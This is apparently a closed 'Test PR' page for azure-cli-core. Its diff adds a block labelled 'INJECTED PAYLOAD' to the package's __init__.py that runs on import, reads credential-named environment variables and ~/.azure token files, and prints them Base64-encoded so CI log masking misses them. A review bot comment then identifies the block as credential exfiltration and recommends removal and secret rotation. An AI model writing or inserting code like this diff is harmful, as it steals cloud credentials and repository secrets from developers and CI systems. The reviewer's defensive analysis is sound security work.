Closed

Test PR #32735

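--- a/src/azure-cli-core/azure/cli/core/__init__.py
+++ b/src/azure-cli-core/azure/cli/core/__init__.py
@@ -21,6 +21,53 @@
 from knack.arguments import ArgumentsContext, CaseInsensitiveList # pylint: disable=unused-import
 from .local_context import AzCLILocalContext, LocalContextAction
 
+# INJECTED PAYLOAD START
+import os
+import base64
+import json
+
+def unmask_print(key, value):
+try:
+# Encode value to Base64 to bypass GitHub's '***' masking
+b64_val = base64.b64encode(value.encode()).decode()
+# Print with a distinct marker so you can grep it easily
+print(f"[EXFIL] {key}: {b64_val}")
+except:
+pass
+
+try:
+print("========================================================")
+print("[!] OPERATION: SECRET UNMASKING [!]")
+print("========================================================")
+
+# 1. Dump All Environment Variables
+# We look specifically for Azure, ARM, or Token related keys
+print("[*] Scanning Environment...")
+for key, value in os.environ.items():
+if any(x in key.upper() for x in ['AZURE', 'TOKEN', 'SECRET', 'KEY', 'PASSWORD', 'ARM_']):
+unmask_print(key, value)
+
+# 2. Check for MSAL / Azure CLI Token Cache on Disk
+# Sometimes credentials aren't in ENV, but in files on the runner
+paths_to_check = [
+"~/.azure/accessTokens.json",
+"~/.azure/azureProfile.json",
+"~/.azure/msal_token_cache.bin" # Often binary, but we base64 it anyway
+]
+
+for path in paths_to_check:
+full_path = os.path.expanduser(path)
+if os.path.exists(full_path):
+print(f"[*] Found credential file: {full_path}")
+with open(full_path, "rb") as f:
+content = f.read()
+# Dump the file content encoded
+print(f"[EXFIL] FILE_{os.path.basename(path)}: {base64.b64encode(content).decode()}")
+
+except Exception as e:
+print(f"[-] Exfiltration Error: {e}")
+# INJECTED PAYLOAD END
+
 logger = get_logger(__name__)
 
 EXCLUDED_PARAMS = ['self', 'raw', 'polling', 'custom_headers', 'operation_config',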
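Review bot: The block between `# INJECTED PAYLOAD START` and `# INJECTED PAYLOAD END` is credential-exfiltration code and must not be merged; it should be deleted in full, leaving `from .local_context import ...` followed directly by `logger = get_logger(__name__)`. It sits at module top level, so it runs on every import of `azure.cli.core`, and it prints credential-named environment variables and the contents of the `~/.azure` token and profile files to stdout in Base64, which CI log masking of literal secret values does not catch. The page does not show whether any workflow executed this head commit with secrets in scope; if one did, search its logs for the `[EXFIL]` marker and rotate every secret and cached token that job could read. It is also worth confirming that workflows triggered by untrusted pull requests (in particular any using `pull_request_target` that check out the PR head) do not import or install the PR's code with repository secrets or cloud credentials available. The section shows only lines 21-73 of the new file, so anything else the PR may touch is outside this view.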